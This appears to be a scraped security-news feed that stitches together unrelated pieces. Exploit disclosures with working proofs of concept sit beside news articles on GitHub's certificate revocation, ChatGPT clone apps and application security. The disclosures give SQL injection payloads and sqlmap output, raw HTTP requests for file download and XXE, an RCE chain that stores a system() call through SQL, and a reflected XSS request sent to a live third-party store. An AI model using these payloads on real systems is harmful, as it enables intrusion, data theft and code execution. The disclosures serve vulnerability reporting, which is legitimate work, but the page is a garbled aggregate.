Online Eyewear Shop version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Online Eyewear Shop 1.0 - Product detail 'id' SQL Injection (Unauthenticated)# Date: 2023-01-02# Exploit Author: Muhammad Navaid Zafar Ansari# Vendor Homepage: https://www.sourcecodester.com/php/16089/online-eyewear-shop-website-using-php-and-mysql-free-download.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-oews.zip# Version: 1.0# Tested on: Kali Linux + PHP 8.2.1, Apache 2.4.55 (Debian)# CVE: Not Assigned Yet# References: -------------------------------------------------------------------------------------1. Description:----------------------Online Eyewear Shop 1.0 allows Unauthenticated SQL Injection via parameter 'id' in 'oews/?p=products/view_product&id=?'  Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.2. Proof of Concept:----------------------Step 1 - By visiting the url: http://localhost/oews/?p=products/view_product&id=5 just add single quote to verify the SQL Injection.Step 2 - Run sqlmap -u "http://localhost/oews/?p=products/view_product&id=3" -p id --dbms=mysqlSQLMap Response:[*] starting @ 04:49:58 /2023-02-01/[04:49:58] [INFO] testing connection to the target URLyou have not declared cookie(s), while server wants to set its own ('PHPSESSID=ft4vh3vs87t...s4nu5kh7ik'). Do you want to use those [Y/n] nsqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: p=products/view_product&id=3' AND 4759=4759 AND 'oKly'='oKly    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: p=products/view_product&id=3' AND (SELECT 5509 FROM (SELECT(SLEEP(5)))KaYM) AND 'phDK'='phDK---[04:50:00] [INFO] testing MySQL[04:50:00] [INFO] confirming MySQL[04:50:00] [INFO] the back-end DBMS is MySQLweb server operating system: Linux Debianweb application technology: Apache 2.4.55, PHPback-end DBMS: MySQL >= 5.0.0 (MariaDB fork)3. Example payload:----------------------(boolean-based)' AND 1=1 AND 'test'='test4. Burpsuite request:----------------------GET /oews/?p=products/view_product&id=5%27+and+0+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,version(),14--+- HTTP/1.1Host: localhostsec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=g491mrrn2ntmqa9akheqr3ujipConnection: close

Online Eyewear Shop 1.0 SQL Injection

Companies need to keep security priorities top of mind during economic downturns so all-important revenue generation doesn't come with a heaping side order of security problems.

In today's digital world, there's no question that security must be a constant priority for companies — whether it's protecting internal corporate information or their products and solutions.

However, when recessionary forces are lurking, security for products and solutions that are offered or sold to end users, such as Web or mobile applications, needs to become an even greater focus. While it might seem counterintuitive in a climate of cost-cutting to spend on security — essentially looked at as a checklist item — the alternative is a world of pain and more costs.

According to Accenture, cyberattacks grew by 31% between 2020 and 2021. This was right as the US was grappling with the COVID-19 pandemic and the negative impact it had on the nation's economy. Now, signs may be pointing to another downturn in the economy this year, something reflected by recent layoffs in the industry.

As a result of these economic factors, the reduction in staff and budgets can create the perfect window for cybercriminals to take advantage while companies focus on continuing to operate and sustain themselves.

**A Window of Opportunity for Cybercriminals**

During down economic periods, companies place a greater focus on generating top-line revenue and allot more staff and resources to accomplish it. This means that, in 2023, companies will prioritize the enhancement of applications by creating new features and functionalities that can drive sales.

Unfortunately, with the majority of staff and resources allocated to application enhancement, security can often fall by the wayside. Particularly, keeping everything updated with the latest security practices.

This deprioritization creates a window of opportunity for cybercriminals to take advantage of flaws or bugs in applications. For example, the Synopsys Cybersecurity Research Center (CyRC) recently highlighted a number of vulnerabilities in a few applications available through various app stores. The CyRC stated that it "uncovered weak or missing authentication mechanisms, missing authorization, and insecure communication vulnerabilities" in the apps Lazy Mouse, Telepad, and PC Keyboard. These vulnerabilities could lead to the gathering of sensitive information, such as login credentials, through the exploitation of keystrokes.

Although we don't know the full impact of these vulnerabilities, these are great examples of the types of flaws or bugs that could fall off the list of priorities for many companies.

**Application Security Is Nonnegotiable**

With any scenario in which an application can be compromised by cybercriminals, there's enormous potential for reputational damage and revenue generation. That's why it's nonnegotiable.

Regardless of whether we're in a recessionary period or not, companies must continue prioritizing all application security activities on the same level as revenue. These activities include:

*   **Vulnerability and penetration testing:** Some of the first security activities that are often deprioritized in times of economic downturn are vulnerability and penetration testing. While a company may conduct this testing every few months during a normal economic period, it may decrease that rate to focus IT and engineering staff efforts on building new features and functionalities. This means there's opportunity for cybercriminals to attack an application that's not kept up to date to determine where its security vulnerabilities lie. It's critical for companies to maintain or increase their testing windows during down economic periods as cyber activities tend to trend up.

*   **Risk assessments:** When developing or enhancing applications, there are often company-created custom features and functionalities as well as those they integrated through a third party. Features and functionalities like this can include payments (Apple Pay, Google Pay, Stripe, PayPal, etc.), access (Facebook or Google login, etc.), biometrics, and more. As with vulnerability and penetration testing, companies must conduct regular risk assessments that include any third-party additions with which they work or integrate. The vulnerabilities inherent to these third parties have the potential to become issues for their business, too.

*   **Privacy protection:** Applications, especially those that are geared toward consumers as the end users, are particularly vulnerable to cyberattacks. Companies must continue to implement the processes and protocols that ensure the safety and encryption of user information.

*   **Bug bounty programs:** Historically, many technology companies or companies that offer applications and software host bug bounty programs that help to identify bugs or flaws. It's important for companies to continue investing in these types of programs that offer compensation to developers for their detections because, as mentioned earlier, flaws and bugs open a window for cybercriminals to exploit applications.

**Keep Priorities in Sight**

As companies look ahead and the economy continues to change, it's important they don't lose sight of their priorities. Yes, it's important to continue to find new revenue streams through applications to keep companies profitable. However, that doesn't have to come at the expense of application security.

Application Security Must Be Nonnegotiable

Categories: News
Tags: GitHub

Tags:  Atom

Tags:  Desktop for Mac

Tags:  Apple Developer ID

Tags:  certificates

Tags:  Digicert

Tags:  sunset

After an unauthorized access incident, GitHub will revoke three certificates which will affect users of Atom and GitHub Desktop for Mac.



(Read more...)




The post GitHub revokes several certificates after unauthorized access appeared first on Malwarebytes Labs.

Posted: February 1, 2023 by

In a call to action, GitHub warned users of GitHub Desktop for Mac and Atom that it will revoke certificates which were exposed during unauthorized access to a set of repositories used in the planning and development of GitHub Desktop and Atom. Revoking these certificates will invalidate some versions of GitHub Desktop for Mac and Atom.

**Mitigation**

Users of GitHub Desktop for Mac and Atom will need to take action before February 2, 2023. There will be no impact to GitHub Desktop for Windows.

The affected versions of Atom are 1.63.0 and 1.63.1. To keep using Atom, users will need to download a previous Atom version. There is and will be no newer version, since Atom has not had significant feature development for the past years and sunset was announced for December 15, 2022.

Affected versions of GitHub Desktop for Mac are 3.0.2, 3.0.3, 3.0.4, 3.0.5, 3.0.6, 3.0.7, 3.0.8, 3.1.0, 3.1.1, and 3.1.2. Users of these versions are asked to update to the latest version of Desktop.

**Certificates**

Certificates are used to verify the author of the software or code. By revoking a certificate it can no longer be used to sign new code. Revoking these certificates does not put existing installations of the Desktop and Atom apps at risk.

Even though the certificates were password-protected and there has been no evidence of malicious use, GitHub does not want to take the risk of a threat actor signing unofficial applications with these certificates and pretend that they were officially created by GitHub.

To prevent that from happening, GitHub will revoke three specific certificates—two Digicert code signing certificates used for Windows and one Apple Developer ID certificate. The Digicert certificates had a short lifespan left and as a result they would have been unusable to sign code after February 2, 2023 anyway. The Apple Developer ID certificate is valid until 2027.

**Why?**

On December 7, 2022, GitHub detected unauthorized access to a set of repositories used in the planning and development of GitHub Desktop and Atom. After investigation, no unauthorized changes were found, but a set of encrypted code signing certificates were exfiltrated. During the unauthorized access which took place on December 6, 2022, repositories from the Atom, Desktop, and other deprecated GitHub-owned organizations were cloned by a compromised Personal Access Token (PAT) associated with a machine account.

**GitHub actions**

Besides a thorough investigation and revoking the three certificates, GitHub has removed the two affected versions of the Atom app (1.63.0-1.63.1) from the releases page. They are also working with Apple to monitor for any new executable files (like applications) signed with the exposed Apple Developer ID certificate until said certificate is revoked on February 2.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

**RELATED ARTICLES**

GitHub revokes several certificates after unauthorized access

Forget Heart Message Box v1.1 was discovered to contain a SQL injection vulnerability via the name parameter at /cha.php.

**Forget Heart Message Box 1.1 has multiple SQL injections****Vulnerability Type :**

SQL Injection

**Vulnerability Version :**

1.1

**Recurring environment:**

*   Windows 10
*   PHP 7.3.4
*   Apache 2.4.43

**Vulnerability Description AND recurrence:**

Vulnerability Documentation：_adminpost.php_

Parameter: name

POST /admin/loginpost.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://192.168.2.101/
Cookie: PHPSESSID=28s17sili7ldmc68goe212s593
Content-Length: 29
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Host: 192.168.2.101
Connection: Keep-alive

login=&name=1232\*&pass=123456

  

Vulnerability Documentation：_cha.php_

Parameter: name

POST /cha.php HTTP/1.1
Host: 192.168.2.24
Content-Length: 57
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.2.24
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.2.24/cha.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=qhndee8uhjmf0g0nrul6nmcurs
Connection: close

name=1\*&go=%E6%9F%A5%E8%AF%A2%E7%95%99%E8%A8%80

**Restoration suggestions**

Filtering of user input or using magic methods.

CVE-2023-24956: Forget Heart Message Box 1.1 has multiple SQL injections · Issue #1 · Mortalwangxin/lives

Easy Images v2.0 was discovered to contain an arbitrary file download vulnerability via the component /application/down.php. This vulnerability is exploited via a crafted GET request.

**EasyImages2.0-arbitrary-file-download-vulnerability****Found on: 2022-12-27****Impact version**

EasyImages2.0 ≤ v2.6.7

**Analysis Report：**

_Vulnerability path: /application/down.php_

payload：

GET /application/down.php?dw=config/config.php HTTP/1.1
Host: 192.168.2.13
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm\_lvt\_c790ac2bdc2f385757ecd0183206108d=1672116632; Hm\_lpvt\_c790ac2bdc2f385757ecd0183206108d=1672149755
Connection: close

You can download any file in the host by passing the dw parameter to the get request

**Fixes**

Specify the download directory to download only for the specified directory, other directories are filtered and requests are rejected.

CVE-2022-48161: GitHub - sunset-move/EasyImages2.0-arbitrary-file-download-vulnerability: EasyImages2.0 arbitrary file download vulnerability

Netcad KEOS 1.0 is vulnerable to XML External Entity (XXE) resulting in SSRF with XXE (remote).

**Exploit Title: CVE-2022-47873 KEOS Software XXE****Exploit Author: Ömer Akincir****Team: Ömer Yılmaz****Version: 1.0 >=****Vuln Details: XXE****Description:**

KEOS application running on the web is vulnerable to XML External Entity (XXE) attack.

**Impact:**

An attacker can trigger SSRF over XXE using Proof Of Concept.

**PoC:**

    POST /KEOS/ HTTP/1.1
    Host:
    Content-Type: application/xml
    Soapaction: ""
    Content-Length: 160
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Encoding: gzip,deflate,br
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36
    
    <?xml version="1.0" encoding="utf-8"?>
    
      <!DOCTYPE roottag PUBLIC "-//A//B//EN" "http://BURP-COLLOBRATOR-URL">
    
      <roottag>test</roottag>
    

Ref: https://github.com/waspthebughunter/CVE-2022-47873

CVE-2022-47873: CVE-2022-47873 KEOS Software XXE - Fordefence - Adli Bilişim Laboratuvarı

By Waqas
Several fake ChatGPT clone apps have surfaced on the official iOS and Play Stores, collecting user data and sending it to remote servers.
This is a post from HackRead.com Read the original post: ChatGPT Clone Apps Collecting Personal Data on iOS, Play Store

On Android devices, one of the apps analyzed by researchers has more than 100,000 downloads, tracks, and shares location data with ByteDance and Amazon, etc.

ChatGPT, the AI software, has already taken the Internet by storm, and that is why cybercriminals are looking to exploit the opportunity for malicious purposes. But the bigger question is, does ChatGPT have official apps for iOS or Play Store? Short answer: No, but we asked ChatGPT about it.

For your information, Chat Generative Pre-Trained Transformer, aka **ChatGPT**, is a chatbot launched in November 2022 by OpenAI. It is part of OpenAI’s GPT-3 family of language models and is compatible with both reinforcement and supervised learning techniques.

According to Top10VPN, unofficial clones and fake apps of the ChatGPT chatbot are available on both the Apple App Store and Google Play Store when they search for the term “ChatGPT.”

The researchers analyzed the ten highest-ranking apps, most of which relied on the new ChatGPT-3 technology. They used open-source tools, such as **mitmproxy**, to examine network traffic in their testing environment and detect risky functionalities in the Android apps’ code.

Moreover, they also analyzed the clone apps’ privacy policies and store pages to understand each app’s data collection and sharing policies.

**_MORE Chatgpt NEWS_**

1.  **OpenAI’s ChatGPT Can Create Polymorphic Malware**
2.  **Hackers Want to abuse ChatGPT by Bypass Restrictions**
3.  **Hackers Exploiting OpenAI’s ChatGPT to Deploy Malware**

**Collecting Android Data**

On Android devices, two clone apps collect/share users’ IP addresses with 3rd parties, whereas one app, identified as ChatGPT AI Writing Assistant with more than 100,000 downloads, tracks/shares location data with ByteDance and Amazon, etc.

Three of these apps ask for permissions that compromise users’ privacy, including recording audio permission, even though in-app speech functions are unavailable.

Moreover, all clone apps feature code with privacy impacts and lack the relevant permissions, including access to location, camera, photos, videos, and read/write storage.

Furthermore, nine apps exploit OpenAI’s GPT-3 technology, which is currently free, and three apps charge for access. One of the apps offers an ad-free tier. The list of malicious Android apps shared by Top10VPN includes the following:

*   AI Chat Companion
*   ChatGPT 3: Chat GPT AI
*   Open AI Chat Gpt – AI 360
*   TalkGPT – Talk to ChatGPT
*   Open Chat – AI Chatbot App
*   ChatGPT AI Writing Assistant

The full list with in-depth details of how and which data these apps collect is **available here**.

**Collecting iOS data**

On iOS devices, the ten top-ranked clone apps collected shared data with inadequate privacy protections. Two apps logged Q&A content, and five allowed third-party trackers to fingerprint devices.

An app called Alfred – Chat with GPT 3 involved in collecting device info (Top10VPN)

According to Top10VPN’s **report**, more than 300 server requests were launched within four minutes by one app. Seven apps did not follow the data collection practices according to their official privacy labels. Nine apps exploited OpenAI’s GPT-3 technology, and eight apps charged up to $15,000 per year for access.

The list of malicious iOS apps shared by Top10VPN includes the following:

*   Open Chat – AI Chatbot
*   Alfred – Chat with GPT 3
*   Genie – GPT AI Assistant
*   TalkGPT – Talk to ChatGPT
*   Chat AI: Personal AI Assistant
*   Write For Me GPT AI Assistant
*   Wisdom Ai – Your AI Assistant

The full list with in-depth details of how and which data these apps collect is **available here**.

**How do These Apps Threaten User Privacy?**

All the top-ten ChatGPT apps in the **Google Play Store** collected shared data with poor privacy protections. The apps shared numerous data points about user devices, such as screen size or network operator.

This may appear harmless on its own, but it can be used for fingerprint devices. Though none of these apps have malicious tendencies, one app was found to be sharing data with ByteDance.

Similarly, many apps are charging the user to access an available free app, which raises ethical concerns. Regarding user data privacy, TalkGPT was the most offensive of all apps, as it tracks users’ precise location data and transfers it to ByteDance, Amazon, Appodeal, AdTech, and InMobi.

It also seeks permission to record audio and collects users’ IP addresses and device fingerprints, which it shares with five third parties, including AdColony, Facebook, Criteo, Everest Technologies, and Google.

In addition, many clone apps mine the personal data of ChatGPT’s userbase, which had exceeded one million users in less than a week of its launch.

1.  **Avast anti-virus acknowledges collecting user data**
2.  **Data Collection Costs Epic Games Half a Billion USD**
3.  **Top 10 Android Ed Apps That Collect Most User Data**
4.  **Android sends more data to Google than iOS to Apple**
5.  **How data collected in gaming can breach user privacy**

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

ChatGPT Clone Apps Collecting Personal Data on iOS, Play Store

GitHub on Monday disclosed that unknown threat actors managed to exfiltrate encrypted code signing certificates pertaining to some versions of GitHub Desktop for Mac and Atom apps.
As a result, the company is taking the step of revoking the exposed certificates out of abundance of caution. The following versions of GitHub Desktop for Mac have been invalidated: 3.0.2, 3.0.3, 3.0.4, 3.0.5, 3.0.6,

Security Incident / Encryption

GitHub on Monday disclosed that unknown threat actors managed to exfiltrate encrypted code signing certificates pertaining to some versions of GitHub Desktop for Mac and Atom apps.

As a result, the company is taking the step of revoking the exposed certificates out of abundance of caution. The following versions of GitHub Desktop for Mac have been invalidated: 3.0.2, 3.0.3, 3.0.4, 3.0.5, 3.0.6, 3.0.7, 3.0.8, 3.1.0, 3.1.1, and 3.1.2.

Versions 1.63.0 and 1.63.1 of 1.63.0 of Atom are also expected to stop working as of February 2, 2023, requiring that users downgrade to a previous version (1.60.0) of Atom. GitHub Desktop for Windows is not affected.

The Microsoft-owned subsidiary said it detected unauthorized access to a set of deprecated repositories used in the planning and development of GitHub Desktop and Atom on December 7, 2022.

The repositories are said to have been cloned a day before by a compromised personal access token (PAT) associated with a machine account. None of the repositories contained customer data, and the compromised credentials have since been revoked. GitHub did not disclose how the token was breached.

"Several encrypted code signing certificates were stored in these repositories for use via Actions in our GitHub Desktop and Atom release workflows," GitHub's Alexis Wales said. "We have no evidence that the threat actor was able to decrypt or use these certificates."

It's worth pointing out that a successful decryption of the certificates could permit an adversary to sign trojanized applications with these certificates and pass them off as originating from GitHub.

The three compromised certificates – two Digicert code signing certificates used for Windows and one Apple Developer ID certificate – are set for revocation on February 2, 2023.

The code hosting platform also said it released a new version of the Desktop app on January 4, 2023, that's signed with new certificates that were not exposed to the threat actor. It further emphasized that no unauthorized changes were made to the code in these repositories.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

GitHub Breach: Hackers Stole Code-Signing Certificates for GitHub Desktop and Atom

Rukovoditel v3.2.1 was discovered to contain a remote code execution (RCE) vulnerability in the component /rukovoditel/index.php?module=dashboard/ajax_request.

**Rukovoditel v3.2.1 has Remote Code Execution in ajax\_request.php**

Author: y1s3m0

vendors:

*   https://www.rukovoditel.net/
    
*   https://sourceforge.net/projects/rukovoditel/files/latest/download
    

**Payload**

database:rukovoditel

In the latest version of Rukovoditel, there is a remote command execution vulnerability that can be exploited simply by combining it with an SQL injection vulnerability. By executing the following command in the database, you can store the command you need. You just need to focus on "id", "type", and "configuration", and make sure that type="fieldtype\_ajax\_request" and configuration are the PHP command you want to execute.

INSERT INTO \`rukovoditel\`.\`app\_fields\`(\`id\`, \`entities\_id\`, \`forms\_tabs\_id\`, \`comments\_forms\_tabs\_id\`, \`forms\_rows\_position\`, \`type\`, \`name\`, \`short\_name\`, \`is\_heading\`, \`tooltip\`, \`tooltip\_display\_as\`, \`tooltip\_in\_item\_page\`, \`tooltip\_item\_page\`, \`notes\`, \`is\_required\`, \`required\_message\`, \`configuration\`, \`sort\_order\`, \`listing\_status\`, \`listing\_sort\_order\`, \`comments\_status\`, \`comments\_sort\_order\`) VALUES (999, 23, 28, 0, '', 'fieldtype\_ajax\_request', 'Subject', '', 1, '', '', 0, '', '', 1, '', '{\\"php\_code\\":\\"system(\\\\"whoami\\\\")\\"}', 3, 1, 3, 0, 0);

Then, by obtaining the administrator's "form\_session\_token" and cookie, you can construct a payload similar to the one below and execute the command stored in the database. Make sure that field\_id is the injected id above.

POST /index.php?module\=dashboard/ajax\_request&field\_id\=999 HTTP/1.1
Host: rukovoditel:8082
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh,zh-CN;q=0.9,ja;q=0.8,vi;q=0.7
Content-Length: 35
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: cookie\_test=please\_accept\_for\_session; sid=ecvuqrogd8e5v7jvlqr2mvhj5c; app\_remember\_me=1; app\_stay\_logged=1; app\_remember\_user=YWRtaW4%3D; app\_remember\_pass=JFAkRTRVRnlFMHhGQzYxMlFqWE5KUHJxLzJHck9oUGVTMA%3D%3D; XDEBUG\_SESSION=XDEBUG\_ECLIPSE
DNT: 1
Origin: http://rukovoditel:8082
Referer: http://rukovoditel:8082/index.php?module=custom\_php/code
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
X-Requested-With: XMLHttpRequest
form\_session\_token=ih7agGdyZZ

CVE-2022-48175: vulnfind/rce_ajax_request.md at main · y1s3m0/vulnfind

Zstore version 6.6.0 suffers from a cross site scripting vulnerability.

    ## Title: zstore-6.6.0 - XSS-Reflected## Development: nu11secur1ty## Date: 01.29.2023## Vendor: https://zippy.com.ua/## Software: https://github.com/leon-mbs/zstore/releases/tag/6.5.4## Reproduce: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/zippy/zstore-6.5.4## Description:The value of manual insertion `point 1` is copied into the HTMLdocument as plain text between tags.The payload giflc<img src=a onerror=alert(1)>c0yu0 was submitted inthe manual insertion point 1.This input was echoed unmodified in the application's response.## STATUS: HIGH Vulnerability[+] Exploit:```GETGET /index.php?p=%41%70%70%2f%50%61%67%65%73%2f%43%68%61%74%67%69%66%6c%63%3c%61%20%68%72%65%66%3d%22%68%74%74%70%73%3a%2f%2f%77%77%77%2e%79%6f%75%74%75%62%65%2e%63%6f%6d%2f%77%61%74%63%68%3f%76%3d%6d%68%45%76%56%39%51%37%7a%66%45%22%3e%3c%69%6d%67%20%73%72%63%3d%68%74%74%70%73%3a%2f%2f%6d%65%64%69%61%2e%74%65%6e%6f%72%2e%63%6f%6d%2f%2d%4b%39%73%48%78%58%41%62%2d%63%41%41%41%41%43%2f%73%68%61%6d%65%2d%6f%6e%2d%79%6f%75%2d%70%61%74%72%69%63%69%61%2e%67%69%66%22%3e%0aHTTP/2Host: store.zippy.com.uaCookie: PHPSESSID=f816ed0ddb0c43828cb387f992ac8521; last_chat_id=439Cache-Control: max-age=0Sec-Ch-Ua: "Chromium";v="107", "Not=A?Brand";v="24"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://store.zippy.com.ua/index.php?q=p:App/Pages/MainAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9```[+] Response:```HTTP/2 200 OKServer: nginxDate: Sun, 29 Jan 2023 07:27:55 GMTContent-Type: text/html; charset=UTF-8Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheX-Ray: p529:0.010/wn19119:0.010/wa19119:D=12546Class \App\Pages\Chatgiflc<ahref="https:\\www.youtube.com\watch?v=mhEvV9Q7zfE"><imgsrc=https:\\media.tenor.com\-K9sHxXAb-cAAAAC\shame-on-you-patricia.gif"> does not exist<br>82<br>/home/zippy00/zippy.com.ua/store/vendor/leon-mbs/zippy/core/webapplication.php<br>```## Proof and Exploit:[href](https://streamable.com/aadj5c)## Reference:[href](https://portswigger.net/kb/issues/00200300_cross-site-scripting-reflected)

Tag

#apple